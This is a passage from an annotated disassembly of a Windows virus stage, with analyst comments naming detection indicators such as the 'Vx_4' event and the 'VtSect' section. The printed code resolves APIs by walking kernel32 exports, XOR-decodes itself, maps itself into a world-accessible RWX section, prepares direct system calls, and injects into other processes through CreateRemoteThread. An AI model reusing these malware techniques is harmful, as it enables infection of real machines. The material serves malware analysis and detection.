        or      eax, 0FFFFFFFFh
        int     2Eh                     ; NT legacy system-service gate with service
                                        ;   number -1 (IDA's DOS annotation does not apply
                                        ;   to a Win32 image).  Together with sldt this
                                        ;   reads like an environment probe; the result
                                        ;   in eax is overwritten below -- confirm intent

loc_31009170:                           ; CODE XREF: UPX2:31009169j
        and     ebx, 0FFFFF000h         ; page-align, then walk down 100h at a time

loc_31009176:                           ; CODE XREF: UPX2:31009185j
        cmp     dword ptr [ebx+4Eh], 73696854h ; "This" of the DOS stub message
        jz      short loc_31009187

loc_3100917F:                           ; CODE XREF: UPX2:31009194j
        sub     ebx, 100h
        jnz     short loc_31009176

loc_31009187:                           ; CODE XREF: UPX2:3100917Dj
        mov     eax, ebx
        add     eax, [ebx+3Ch]          ; eax -> IMAGE_NT_HEADERS (e_lfanew)
        mov     edx, [eax+78h]          ; DataDirectory[0]: export directory RVA
        cmp     word ptr [eax], 4550h   ; "PE" signature, else keep walking
        jnz     short loc_3100917F
        add     edx, ebx                ; edx -> IMAGE_EXPORT_DIRECTORY
        mov     esi, [edx+20h]          ; AddressOfNames
        mov     ecx, [edx+18h]          ; NumberOfNames
        add     esi, ebx
        push    ecx                     ; keep the count: index = count - remaining

loc_310091A1:                           ; CODE XREF: UPX2:loc_310091B5j
        lodsd
        add     eax, ebx                ; eax -> export name
        cmp     word ptr [eax+2], 5074h ; "tP"   -- "GetProcAddress" matched on
        jnz     short loc_310091B5      ;           chars 2-3 and 5-8
        cmp     dword ptr [eax+5], 6441636Fh ; "ocAd"
        jz      short loc_310091BA

loc_310091B5:                           ; CODE XREF: UPX2:310091AAj
        loop    loc_310091A1
        pop     ecx
        jmp     short loc_310091E5      ; not found: restore registers and return
; ---------------------------------------------------------------------------

loc_310091BA:                           ; CODE XREF: UPX2:310091B3j
        sub     [esp], ecx              ; [esp] = index of the matching name
        mov     esi, [edx+24h]          ; AddressOfNameOrdinals
        pop     ecx
        add     esi, ebx
        movzx   eax, word ptr [esi+ecx*2] ; ordinal
        mov     edi, [edx+1Ch]          ; AddressOfFunctions (edi keeps this; reused
        add     edi, ebx                ;   on the Win9x path via push/pop edi)
        mov     esi, [edi+eax*4]
        add     esi, ebx                ; esi = GetProcAddress from here on
        lea     eax, [ebp+101137h]      ; eax -> loc_3100922C, start of the encoded run
        lea     ecx, [ebp+101120h]      ; ecx -> the "push ebx" hidden in the misdecoded
                                        ;   "or dh,[edi+53h]" below (53h = push ebx)
        mov     dx, [eax-19h]           ; 16-bit rolling key from [ebp+10111Eh]
        call    ecx                     ; decode 2889h bytes (up to the flags dword)
        jmp     short loc_3100922C      ; run them
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31009273
; Common exit: in "restore" mode write the saved 5 bytes back to the adjusted
; return site and restore ebx/esi/edi; then pop ebp and return there.

loc_310091E5:                           ; CODE XREF: UPX2:310091B8j
                                        ; sub_31009273+10j ...
        mov     eax, [ebp+1039C0h]      ; flags dword (== [eax+29BBh] at entry)
        and     eax, 400000h
        jz      short loc_31009211
        lea     esi, [ebp+1039C4h]      ; the saved 5 bytes (first byte tested for E8h)
        lodsd
        mov     edi, [esp+arg_0]        ; [esp+4] = adjusted return address
        stosd                           ; restore 4 bytes ...
        mov     ebx, [ebp+104308h]      ; caller's ebx
        movsb                           ; ... and the fifth
        mov     edi, [ebp+104310h]      ; caller's edi, esi
        mov     esi, [ebp+10430Ch]

loc_31009211:                           ; CODE XREF: sub_31009273-83j
        pop     ebp
        retn                            ; to (saved slot - 1EFAh)
; END OF FUNCTION CHUNK FOR sub_31009273
; ---------------------------------------------------------------------------
; Rolling-XOR decoder.  Entered one byte into the misdecoded instruction: the
; 53h byte is "push ebx", matched by the "pop ebx / retn" at the end.
; In: eax -> data, dx = key.  Step: [eax] ^= dl; dl -= bl; swap bl/bh and
; dl/dh.  Length fixed at 2889h bytes.
        or      dh, [edi+53h]
        mov     ecx, 2889h
        mov     ebx, edx

loc_3100921D:                           ; CODE XREF: UPX2:31009228j
        xor     [eax], dl
        sub     dl, bl
        add     eax, 1
        xchg    bl, bh
        xchg    dl, dh
        loop    loc_3100921D
        pop     ebx
        retn
; ---------------------------------------------------------------------------
; From here on the listing is plaintext (the byte runs spell API names), so
; this dump was taken after the decoder ran.  Pattern used repeatedly:
; "call <label+n>" with an ASCII name right after the call -- the call pushes
; the string's address, then "push ebx" (kernel32 base) / "call esi"
; (GetProcAddress) resolves it.  IDA shows the string bytes as instructions;
; they are kept as listed, annotated with the characters they are.

loc_3100922C:                           ; CODE XREF: UPX2:310091E3j
        call    near ptr loc_3100923B+2 ; pushes -> "CloseHandle"
        inc     ebx                     ; 'C'
        insb                            ; 'l'
        outsd                           ; 'o'
        jnb     short near ptr loc_31009298+3 ; 's','e'
        dec     eax                     ; 'H'
        popa                            ; 'a'
        outsb                           ; 'n'
        db      64h                     ; 'd'
        insb                            ; 'l'

loc_3100923B:                           ; CODE XREF: UPX2:loc_3100922Cp
        add     gs:[ebx-1], dl          ; 'e', NUL, then 53h = push ebx, FFh ..
        setalc                          ; .. D6h: call esi = GetProcAddress(kernel32, "CloseHandle")
        mov     [ebp+103E62h], eax      ; [ebp+103E62h] = CloseHandle
        call    near ptr loc_31009257+1 ; pushes -> "CreateEventA"
        inc     ebx                     ; 'C'
        jb      short loc_310092B3      ; 'r','e'
        popa                            ; 'a'
        jz      short near ptr loc_310092B5+1 ; 't','e'
        inc     ebp                     ; 'E'
        jbe     short near ptr loc_310092B5+4 ; 'v','e'
        outsb                           ; 'n'
        jz      short loc_31009298      ; 't','A'

loc_31009257:                           ; CODE XREF: UPX2:31009246p
        add     [ebx-1], dl             ; NUL, 53h push ebx, FFh ..
        setalc                          ; .. D6h: call esi = GetProcAddress(kernel32, "CreateEventA")
        mov     [ebp+103E66h], eax      ; [ebp+103E66h] = CreateEventA
        call    sub_31009273            ; pushes -> "GetLastError" (bytes below)
        inc     edi                     ; 'G'
        db      65h                     ; 'e'
        jz      short near ptr loc_310092B5+1 ; 't','L'
        popa                            ; 'a'
        jnb     short near ptr loc_310092DF+2 ; 's','t'
        inc     ebp                     ; 'E'
        jb      short near ptr loc_310092DF+3 ; 'r','r'
        outsd                           ; 'o'
        jb      short $+2               ; 'r', NUL

; =============== S U B R O U T I N E =======================================
; sub_31009273 -- single-instance gate plus the stage's main dispatch.
; Entered with [esp] -> "GetLastError" (pushed by the call at 31009261),
; ebx = kernel32 base, esi = GetProcAddress, ebp = blob delta.
; 1. resolve GetLastError;  2. sub_31009654 creates the named event "Vx_4"
;    with a NULL-DACL descriptor: NULL handle -> return via loc_310091E5,
;    GetLastError != 0 afterwards (event already existed) -> loc_31009629
;    closes it and returns, i.e. a second instance backs off;
; 3. resolve 32 kernel32 APIs into the table at [ebp+103E7Ah] (offsets below
;    are 103E7Ah + 4*index into the name list after sub_31009691) and branch
;    on GetVersion's platform bit: Win9x path here, NT path at loc_310093D8.
; IDA's "InternetCloseHandle" note on "call esi" is unsupported: esi holds
; GetProcAddress from the export walk above.
; Detection notes: named event "Vx_4"; the paths below map a writable and
; executable copy of this blob and continue executing from it.
sub_31009273 proc near                  ; CODE XREF: UPX2:31009261p

arg_0   = dword ptr 4

; FUNCTION CHUNK AT 310091E5 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31009629 SIZE 0000000B BYTES

        push    ebx                     ; hModule = kernel32
        call    esi                     ; GetProcAddress(kernel32, "GetLastError")
        mov     [ebp+103E6Ah], eax      ; [ebp+103E6Ah] = GetLastError
        call    sub_31009654            ; CreateEventA(&sa, 0, 0, "Vx_4")
        test    eax, eax
        jz      loc_310091E5            ; could not create: return
        push    eax                     ; the handle stays on the stack and becomes
        call    dword ptr [ebp+103E6Ah] ;   CloseHandle's argument at loc_31009629
        test    eax, eax                ; GetLastError() != 0: already running
        jnz     loc_31009629

loc_31009298:                           ; CODE XREF: UPX2:31009255j
                                        ; UPX2:31009234j
        cmp     byte ptr [ebp+10153Fh], 1 ; one-shot flag
        jnz     short loc_310092B5
        push    dword ptr [ebp+104308h] ; [ebp+101598h] = saved caller ebx, flag cleared
        dec     byte ptr [ebp+10153Fh]
        pop     dword ptr [ebp+101598h]

loc_310092B3:                           ; CODE XREF: UPX2:3100924Cj
        jmp     short loc_310092BC
; ---------------------------------------------------------------------------

loc_310092B5:                           ; CODE XREF: sub_31009273+2Cj
                                        ; UPX2:3100924Fj ...
        and     dword ptr [ebp+101598h], 0

loc_310092BC:                           ; CODE XREF: sub_31009273:loc_310092B3j
        and     dword ptr [ebp+101588h], 0 ; clear three state dwords
        and     dword ptr [ebp+10158Ch], 0
        and     dword ptr [ebp+101590h], 0
        push    edi                     ; edi -> kernel32 AddressOfFunctions
        mov     byte ptr [ebp+1012D4h], 1
        mov     [ebp+103E6Eh], esi      ; [ebp+103E6Eh] = GetProcAddress (sub_31009691 uses it)

loc_310092DF:                           ; CODE XREF: UPX2:3100926Bj
                                        ; UPX2:3100926Ej
        lea     esi, [ebp+101604h]      ; 32 NUL-separated kernel32 names, "lstrlen" first
        xor     ecx, ecx
        lea     edi, [ebp+103E7Ah]      ; output table
        mov     cl, 20h
        call    sub_31009691            ; table[i] = GetProcAddress(kernel32, name[i])
        pop     edi
        call    dword ptr [ebp+103EBAh] ; index 16 = GetVersion
        shr     eax, 1Fh                ; bit 31 set = Win32s/9x platform
        jz      loc_310093D8            ; clear = NT: section-based path
        mov     eax, [edi+14h]          ; Win9x: kernel32 AddressOfFunctions[5], an
        push    40h                     ;   export taken by position; identity unconfirmed
        add     eax, ebx
        push    8001000h                ; MEM_COMMIT | 8000000h -- the high flag is not a
        mov     [ebp+103E72h], eax      ;   documented NT value; on 9x it reads like a
        push    7328h                   ;   shared-arena request.  Size = 7328h
        push    0
        call    dword ptr [ebp+103EF2h] ; index 30 = VirtualAlloc(0, 7328h, flags, PAGE_EXECUTE_READWRITE)
        test    eax, eax
        jz      loc_31009629
        xchg    eax, edi                ; edi = new block
        lea     esi, [ebp+101000h]      ; copy this blob (0CCAh dwords) into it
        mov     ebp, edi
        mov     ecx, 0CCAh
        sub     ebp, 101000h            ; rebase the delta onto the copy
        lea     edx, [ebp+101254h]      ; resume at offset 254h of the copy, i.e. below
        rep movsd
        jmp     edx
; ---------------------------------------------------------------------------
; Runs inside the Win9x copy only.  Builds a 32-byte zeroed block on the
; stack ([+10h] = code pointer ebp+101B4Dh, byte [+1Ch] = 1) and makes four
; calls through [ebp+103E72h] with codes 10003h / 10000h / 10001h / 1000Ah,
; a platform-specific ring-transition style interface; the service
; semantics are not recoverable from this listing.
        sub     esp, 20h
        mov     edi, esp
        push    8
        xor     eax, eax
        pop     ecx
        lea     edx, [ebp+101B4Dh]
        rep stosd                       ; zero the 8 dwords
        mov     edi, esp
        mov     [edi+10h], edx
        inc     byte ptr [edi+1Ch]
        push    edi
        push    10003h
        call    dword ptr [ebp+103E72h]
        add     esp, 20h
        test    eax, eax
        jz      loc_31009629
        xchg    eax, edi
        push    0
        push    1
        push    80000400h
        push    10000h
        call    dword ptr [ebp+103E72h]
        test    eax, eax
        jz      loc_31009629
        push    0
        push    eax
        push    40000h
        push    0
        shr     eax, 0Ch                ; result >> 12 (page number)
        push    edi
        push    1
        push    eax
        push    10001h
        call    dword ptr [ebp+103E72h]
        push    1000Ah
        call    dword ptr [ebp+103E72h]
        call    loc_310093C8
        jmp     loc_31009629
; ---------------------------------------------------------------------------
; Stall loop.  As written ecx is forced to 0, so jecxz returns at once and
; the Sleep(0Ah) loop is dead -- presumably a patch point.

loc_310093C8:                           ; CODE XREF: sub_31009273+14Bp
                                        ; sub_31009273+162j
        push    0
        pop     ecx
        jecxz   short locret_310093D7
        push    0Ah
        call    dword ptr [ebp+103EE6h] ; index 27 = Sleep
        jmp     short loc_310093C8
; ---------------------------------------------------------------------------

locret_310093D7:                        ; CODE XREF: sub_31009273+158j
        retn
; ---------------------------------------------------------------------------

loc_310093D8:                           ; CODE XREF:
sub_31009273+8Bj
; NT path of sub_31009273.  Table offsets: kernel32 103E7Ah + 4*index,
; ntdll 103EFAh + 4*index, indices by position in the name lists below.
; IDA's "endp" a few lines down is an sp-analysis artefact; the code flows
; straight through it.
        cmp     dword ptr [ebp+103E92h], 0 ; index 6 = CreateToolhelp32Snapshot; absent -> give up
        jz      loc_31009629
        call    near ptr loc_310093EF+1 ; pushes -> "NTDLL" (bytes below)
        dec     esi                     ; 'N'
        push    esp                     ; 'T'
        inc     esp                     ; 'D'
        dec     esp                     ; 'L'
        dec     esp                     ; 'L'

loc_310093EF:                           ; CODE XREF: sub_31009273+172p
        add     bh, bh                  ; NUL, then FFh ..
sub_31009273 endp ; sp-analysis failed
        xchg    eax, ebp                ; .. 95h
        scasb                           ; .. AEh
        db      3Eh                     ; .. 3Eh
        adc     [eax], al               ; .. 10h 00h: FF 95 AE 3E 10 00 =
                                        ;   call dword ptr [ebp+103EAEh], index 13 =
                                        ;   GetModuleHandleA("NTDLL")
        lea     esi, [ebp+1017DEh]      ; 14 NUL-separated ntdll names, "NtAdjustPrivilegesToken" first
        xor     ecx, ecx
        lea     edi, [ebp+103EFAh]      ; ntdll table
        mov     cl, 0Eh
        xchg    eax, ebx                ; ebx = ntdll base (kernel32 base parked in eax)
        call    sub_31009691
        cmp     dword ptr [ebp+103F2Eh], 0 ; index 13 = RtlUnicodeStringToAnsiString resolved?
        jz      loc_31009629
; Each Nt* export begins with "mov eax, imm32"; [stub+1] is that immediate,
; the system-service number.  Five are copied into the blob (NtCreateFile,
; NtOpenFile, NtCreateProcess, and NtCreateProcessEx / NtCreateUserProcess
; when present) -- consistent with preparing direct system calls that bypass
; ntdll.  Reading ntdll stub bytes this way is itself worth a detection rule.
        mov     eax, [ebp+103EFEh]      ; index 1 = NtCreateFile
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+103917h]
        mov     eax, [ebp+103F16h]      ; index 7 = NtOpenFile
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+103964h]
        mov     eax, [ebp+103F02h]      ; index 2 = NtCreateProcess
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+10396Bh]
        cmp     dword ptr [ebp+10396Bh], 10000h ; sanity bound on the service number
        jnb     loc_31009629
        mov     ecx, [ebp+103F06h]      ; index 3 = NtCreateProcessEx (may be 0)
        jecxz   short loc_31009478
        push    dword ptr [ecx+1]
        pop     dword ptr [ebp+103978h]
        mov     ecx, [ebp+103F0Eh]      ; index 5 = NtCreateUserProcess (may be 0)
        jecxz   short loc_31009478
        push    dword ptr [ecx+1]
        pop     dword ptr [ebp+103985h]

loc_31009478:                           ; CODE XREF: UPX2:3100945Cj
                                        ; UPX2:3100946Dj
        call    sub_31009635            ; eax -> SECURITY_ATTRIBUTES with a NULL-DACL SD
        lea     edi, [ebp+103F84h]
        mov     ecx, edi
        push    0                       ; OBJECT_ATTRIBUTES, last field first:
        neg     cl                      ;   SecurityQualityOfService = 0
        push    dword ptr [eax+4]       ;   SecurityDescriptor = sa.lpSecurityDescriptor
        and     ecx, 3
        push    40h                     ;   Attributes = OBJ_CASE_INSENSITIVE
        add     edi, ecx                ; edi -> 4-byte-aligned UNICODE_STRING slot
        push    edi                     ;   ObjectName
        push    0                       ;   RootDirectory = 0
        push    18h                     ;   Length = 18h
        lea     esi, [ebp+1015EBh]      ; "\BaseNamedObjects\VtSect" (25 bytes incl. NUL,
        mov     ecx, 19h                ;   the string just before "lstrlen" below)
        lea     eax, ds:0FFFFFFFEh[ecx*2] ; Length = 2*25-2 = 48 (no terminator)
        stosw
        lea     eax, ds:0[ecx*2]        ; MaximumLength = 50
        stosw
        lea     eax, [edi+4]            ; Buffer = right after the header
        stosd
        xor     ah, ah
        lea     edx, [ebp+103E30h]      ; second copy of the widened name

loc_310094C1:                           ; CODE XREF: UPX2:310094CAj
        lodsb                           ; ANSI -> UTF-16 by zero extension
        mov     [edx], ax
        stosw
        add     edx, 2
        loop    loc_310094C1
        mov     edx, esp                ; edx -> OBJECT_ATTRIBUTES
        push    0
        push    7328h
        mov     ecx, esp                ; ecx -> MaximumSize (LARGE_INTEGER 7328h)
        push    0
        mov     eax, esp                ; eax -> SectionHandle (out)
        push    0                       ; FileHandle = 0 (pagefile-backed)
        push    8000000h                ; SEC_COMMIT
        push    40h                     ; PAGE_EXECUTE_READWRITE
        push    ecx                     ; MaximumSize
        push    edx                     ; ObjectAttributes
        push    0Eh                     ; SECTION_MAP_READ | WRITE | EXECUTE
        push    eax                     ; SectionHandle
        call    dword ptr [ebp+103F0Ah] ; index 4 = NtCreateSection: a named RWX section,
                                        ;   reachable by everyone because of the NULL DACL
        pop     eax                     ; eax = section handle
        add     esp, 40h                ; drop MaximumSize, the OA and the 8 dwords from sub_31009635
        push    7328h
        mov     edx, esp                ; edx -> ViewSize (in/out)
        push    0
        mov     ecx, esp                ; ecx -> BaseAddress (0 = kernel chooses)
        push    40h                     ; Win32Protect
        push    0                       ; AllocationType
        push    2                       ; InheritDisposition = ViewUnmap
        push    edx                     ; ViewSize
        push    0                       ; SectionOffset
        push    7328h                   ; CommitSize
        push    0                       ; ZeroBits
        push    ecx                     ; BaseAddress
        push    0FFFFFFFFh              ; ProcessHandle = current process
        push    eax                     ; SectionHandle
        call    dword ptr [ebp+103F12h] ; index 6 = NtMapViewOfSection
        pop     edi                     ; edi = mapped base
        pop     ecx
        test    edi, edi
        jz      loc_31009629
        lea     esi, [ebp+101000h]      ; copy the blob into the section and continue
        mov     ecx, 0CCAh              ;   there at offset 44Ah (the byte run below)
        mov     ebp, edi
        rep movsd
        sub     ebp, 101000h
        lea     eax, [ebp+10144Ah]
        jmp     eax
; ---------------------------------------------------------------------------
; Not disassembled by IDA but executed (offset 44Ah of the copy).  Decoded by
; hand from the dwords -- confirm with a disassembler before quoting:
; NtOpenProcessToken(-1, 20h, &h) / push "SeDebugPrivilege" and a call into
; the helper after sub_31009691 (LoadLibraryA + LookupPrivilegeValueA) /
; FreeLibrary / CloseHandle, then CreateToolhelp32Snapshot(2, 0) and a
; Process32First/Next loop over 128h-byte PROCESSENTRY32 records that skips
; the first four entries and names starting "csrs", calling OpenProcess(2Ah)
; and CreateRemoteThread (kernel32 indices 22 and 4) for the others -- a
; process-injection sweep.
        db 50h
        dd 6A206A54h, 1A95FFFFh, 8500103Fh, 34755FC0h, 14FE8h
        dd 11E800h, 65530000h, 75626544h, 69725067h, 656C6976h ; "SeDebugPrivilege"
        dd 57006567h, 550E8h, 88B5FF00h, 0FF001042h, 103E9E95h
        dd 95FF5700h, 103E62h, 26A006Ah, 3E9295FFh, 28B90010h
        dd 97000001h, 0C89E12Bh, 0FF575424h, 103ED695h, 83F63300h
        dd 103F72A5h, 57540000h, 3EDA95FFh, 0C0850010h, 83466674h
        dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 3ED295FFh, 0C0850010h
        dd 0E893DC74h, 588h, 0E391C933h, 7285393Ah, 7500103Fh
        dd 247C8132h, 72736324h, 81287473h, 0EAFC1h, 50545000h ; cmp [esp+24h], "csrs"
        dd 50505156h, 8A95FF53h, 8500103Eh, 0F7459C0h, 82474FFh
        dd 3F72858Fh, 0B5E80010h, 53FFFFFDh, 3E6295FFh, 8EEB0010h
        dd 128C481h, 0FF570000h, 103E6295h
        db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31009273
; Error / exit path: CloseHandle(<dword on top of the stack>), then the common
; restore-and-return at loc_310091E5.  From sub_31009273+1F that dword is the
; event handle; from the later jz sites it is whatever is on top.

loc_31009629:                           ; CODE XREF: sub_31009273+1Fj
                                        ; sub_31009273+B2j ...
        call    dword ptr [ebp+103E62h] ; CloseHandle
        jmp     loc_310091E5
; END OF FUNCTION CHUNK FOR sub_31009273
; ---------------------------------------------------------------------------
        db 0

; =============== S U B R O U T I N E =======================================
; sub_31009635 -- builds on the caller's stack a SECURITY_DESCRIPTOR
; {Revision=1, Sbz1=0, Control=SE_DACL_PRESENT (dword 40001h), Owner=Group=
; Sacl=Dacl=0} and a SECURITY_ATTRIBUTES {nLength=0Ch, &sd, bInheritHandle=0}
; pointing at it.  It pops its return address first and leaves with
; "jmp edx", so the eight dwords stay on the stack for the caller to remove
; (the callers do "add esp, 20h" / "add esp, 40h").
; Out: eax -> SECURITY_ATTRIBUTES.  Clobbers: edx.
; A present-but-NULL DACL grants everyone full access to the object.
sub_31009635 proc near                  ; CODE XREF: UPX2:loc_31009478p
                                        ; sub_31009654+2p
        pop     edx                     ; return address
        push    0                       ; sd.Dacl
        push    0                       ; sd.Sacl
        push    0                       ; sd.Group
        push    0                       ; sd.Owner
        push    40001h                  ; sd.Revision=1, Sbz1=0, Control=4
        mov     eax, esp                ; eax -> sd
        push    0                       ; sa.bInheritHandle
        push    eax                     ; sa.lpSecurityDescriptor
        push    0Ch                     ; sa.nLength
        mov     eax, esp                ; eax -> sa
        jmp     edx
sub_31009635 endp

; ---------------------------------------------------------------------------
aVx_4   db 'Vx_4',0                     ; event name; [ebp+101559h] in sub_31009654 lands
                                        ;   here by the listing's offsets.  Host IoC.
        align 4

; =============== S U B R O U T I N E =======================================
; sub_31009654 -- CreateEventA(&sa(NULL DACL), bManualReset=0,
; bInitialState=0, "Vx_4") via [ebp+103E66h].  Returns eax = handle or 0.
; "add esp, 20h" removes the eight dwords sub_31009635 left (the stdcall
; callee already popped its four arguments).
sub_31009654 proc near                  ; CODE XREF: sub_31009273+9p
        xor     ecx, ecx
        call    sub_31009635            ; eax -> SECURITY_ATTRIBUTES on the stack
        lea     edx, [ebp+101559h]      ; "Vx_4" (aVx_4 above)
        push    edx                     ; lpName
        push    ecx                     ; bInitialState = 0
        push    ecx                     ; bManualReset = 0
        push    eax                     ; lpEventAttributes
        call    dword ptr [ebp+103E66h] ; CreateEventA
        add     esp, 20h
        retn
sub_31009654 endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Unreferenced bytes.
        db 8Bh, 0FFh
        db 3 dup(58h)
        dd 332800h, 0E7300h, 100h, 2 dup(0)
        dd 29C000h, 0
        db 0

; =============== S U B R O U T I N E =======================================
; sub_31009691 -- resolve a run of NUL-separated names into an address table.
; In:  ebx = module base, esi -> first name, edi -> output table, ecx = count,
;      [ebp+103E6Eh] = GetProcAddress.
; Out: edi past the table, esi past the last name, eax = last result.
; "loop" targets the proc's first instruction, so the whole body is the loop;
; a name that fails to resolve simply stores 0 (callers test for that).
sub_31009691 proc near                  ; CODE XREF: sub_31009273+7Cp
                                        ; UPX2:31009407p ...
        push    ecx                     ; keep the counter across the call
        push    esi                     ; lpProcName
        push    ebx                     ; hModule
        call    dword ptr [ebp+103E6Eh] ; GetProcAddress
        stosd                           ; table[i] = result
        pop     ecx

loc_3100969C:                           ; CODE XREF: sub_31009691+Ej
        lodsb                           ; advance past the NUL
        test    al, al
        jnz     short loc_3100969C
        loop    sub_31009691
        retn
sub_31009691 endp

; ---------------------------------------------------------------------------
; Helper used from the offset-44Ah byte run (decodes as: LoadLibraryA of the
; string at [ebp+101985h] -> [ebp+104288h]; GetProcAddress of
; "LookupPrivilegeValueA" -> [ebp+10428Ch]; retn), followed by the name data:
;   "\BaseNamedObjects\VtSect"     section name built at loc_31009478
;   32 kernel32 names "lstrlen" .. "WriteFile"   -> table at [ebp+103E7Ah]
;   14 ntdll names "NtAdjustPrivilegesToken" ..  -> table at [ebp+103EFAh]
;   (continuing past this line) ws2_32, wininet and advapi32 names.
; Table index = position in its list, e.g. kernel32 16 = GetVersion,
; 27 = Sleep, 30 = VirtualAlloc; ntdll 4 = NtCreateSection.
        dd 1985958Dh, 0FF520010h, 103EC695h, 88858900h, 0E8001042h ; lea edx,[ebp+101985h] / push / call [103EC6h]=LoadLibraryA / mov [104288h],eax / call +16h
        dd 16h, 6B6F6F4Ch, 72507075h, 6C697669h, 56656765h, 65756C61h ; "LookupPrivilegeValue
        dd 0FF500041h, 103E6E95h, 8C858900h, 0C3001042h, 7361425Ch ; A" / push eax / call [103E6Eh] / mov [10428Ch],eax / retn / "\Bas
        dd 6D614E65h, 624F6465h, 7463656Ah, 74565C73h, 74636553h ; eNamedObjects\VtSect
        dd 74736C00h, 6E656C72h, 65724300h, 46657461h, 41656C69h ; " "lstrlen" "CreateFileA"
        dd 65724300h, 46657461h, 4D656C69h, 69707061h, 41676Eh ; "CreateFileMappingA"
        dd 61657243h, 72506574h, 7365636Fh, 43004173h, 74616572h ; "CreateProcessA" "Creat
        dd 6D655265h, 5465746Fh, 61657268h, 72430064h, 65746165h ; eRemoteThread" "Create
        dd 65726854h, 43006461h, 74616572h, 6F6F5465h, 6C65686Ch ; Thread" "CreateToolhel
        dd 53323370h, 7370616Eh, 746F68h, 74697845h, 65726854h ; p32Snapshot" "ExitThre
        dd 46006461h, 54656C69h, 54656D69h, 7379536Fh, 546D6574h ; ad" "FileTimeToSystemT
        dd 656D69h, 65657246h, 7262694Ch, 797261h, 46746547h, 41656C69h ; ime" "FreeLibrary" "GetFileA
        dd 69727474h, 65747562h, 47004173h, 69467465h, 6953656Ch ; ttributesA" "GetFileSi
        dd 4700657Ah, 69467465h, 6954656Ch, 4700656Dh, 6F4D7465h ; ze" "GetFileTime" "GetMo
        dd 656C7564h, 646E6148h, 41656Ch, 54746547h, 46706D65h ; duleHandleA" "GetTempF
        dd 4E656C69h, 41656D61h, 74654700h, 706D6554h, 68746150h ; ileNameA" "GetTempPath
        dd 65470041h, 72655674h, 6E6F6973h, 74654700h, 73726556h ; A" "GetVersion" "GetVers
        dd 456E6F69h, 47004178h, 6F567465h, 656D756Ch, 6F666E49h ; ionExA" "GetVolumeInfo
        dd 74616D72h, 416E6F69h, 616F4C00h, 62694C64h, 79726172h ; rmationA" "LoadLibrary
        dd 614D0041h, 65695670h, 46664F77h, 656C69h, 6E65704Fh ; A" "MapViewOfFile" "Open
        dd 656C6946h, 7070614Dh, 41676E69h, 65704F00h, 6F72506Eh ; FileMappingA" "OpenPro
        dd 73736563h, 6F725000h, 73736563h, 69463233h, 747372h ; cess" "Process32First"
        dd 636F7250h, 33737365h, 78654E32h, 65530074h, 6C694674h ; "Process32Next" "SetFil
        dd 74744165h, 75626972h, 41736574h, 74655300h, 656C6946h ; eAttributesA" "SetFile
        dd 656D6954h, 656C5300h, 53007065h, 65747379h, 6D69546Dh ; Time" "Sleep" "SystemTim
        dd 466F5465h, 54656C69h, 656D69h, 616D6E55h, 65695670h ; eToFileTime" "UnmapViewO
        dd 46664F77h, 656C69h, 74726956h, 416C6175h, 636F6C6Ch ; fFile" "VirtualAlloc"
        dd 69725700h, 69466574h, 4E00656Ch, 6A644174h, 50747375h ; "WriteFile" "NtAdjustP
        dd 69766972h, 6567656Ch, 6B6F5473h, 4E006E65h, 65724374h ; rivilegesToken" "NtCreat
        dd 46657461h, 656C69h, 7243744Eh, 65746165h, 636F7250h ; eFile" "NtCreateProc
        dd 737365h,                     ; ess" ... (list continues on the next line)
7243744Eh, 65746165h, 636F7250h, 45737365h dd 744E0078h, 61657243h, 65536574h, 6F697463h, 744E006Eh dd 61657243h, 73556574h, 72507265h, 7365636Fh, 744E0073h dd 5670614Dh, 4F776569h, 63655366h, 6E6F6974h, 4F744E00h dd 466E6570h, 656C69h, 704F744Eh, 72506E65h, 7365636Fh dd 6B6F5473h, 4E006E65h, 65704F74h, 6365536Eh, 6E6F6974h dd 50744E00h, 65746F72h, 69567463h, 61757472h, 6D654D6Ch dd 79726Fh, 7551744Eh, 49797265h, 726F666Eh, 6974616Dh dd 6F546E6Fh, 6E656Bh, 7257744Eh, 56657469h, 75747269h dd 654D6C61h, 79726F6Dh, 6C745200h, 63696E55h, 5365646Fh dd 6E697274h, 416F5467h, 5369736Eh, 6E697274h, 53570067h dd 61745341h, 70757472h, 6F6C6300h, 6F736573h, 74656B63h dd 6E6F6300h, 7463656Eh, 74656700h, 74736F68h, 616E7962h dd 7200656Dh, 766365h, 646E6573h, 636F7300h, 74656Bh, 65746E49h dd 74656E72h, 736F6C43h, 6E614865h, 656C64h, 65746E49h dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h dd 6E490065h, 6E726574h, 704F7465h, 416E65h, 65746E49h dd 74656E72h, 6E65704Fh, 416C7255h, 746E4900h, 656E7265h dd 61655274h, 6C694664h, 44410065h, 49504156h, 442E3233h dd 52004C4Ch, 6C436765h, 4B65736Fh, 52007965h, 704F6765h dd 654B6E65h, 41784579h, 67655200h, 72657551h, 6C615679h dd 78456575h, 65520041h, 74655367h, 756C6156h, 41784565h dd 0F6335600h, 5656026Ah, 16AD48Bh, 1872FF52h, 8C95FF56h dd 8B001042h, 565656C4h, 70FF5650h, 0FA95FF18h, 8300103Eh dd 0C25E10C4h, 498D0008h, 51C82BFBh, 68h, 244C8DE8h, 6A006A03h dd 53505105h, 0CC8B056Ah, 50D48B50h, 51406A54h, 95FF5352h dd 103F22h, 0FF0CC483h, 103F2A95h, 8C48300h, 30958DC3h dd 3300103Eh, 52006AC9h, 32003068h, 51C48B00h, 50406A51h dd 83186A51h, 6A5408C0h, 95FF500Eh, 103F1Eh, 3320C483h dd 0FC085D2h, 0DAF7C299h, 0C3C22358h, 0E8FF3357h, 0FFFFFFC1h dd 0A5840Fh, 68500000h, 7328h, 6AD48Bh, 406ACC8Bh, 10000068h dd 52026A00h, 2868006Ah, 6A000073h, 50535100h, 3F1295FFh dd 595F0010h, 3E6295FFh, 0FF850010h, 8D8B7174h, 101590h dd 958D0CE3h, 101000h, 5357D103h, 858BD2FFh, 103EFEh, 29168F8Dh dd 2BE80000h, 8BFFFFFFh, 103F1685h, 638F8D00h, 0E8000029h dd 
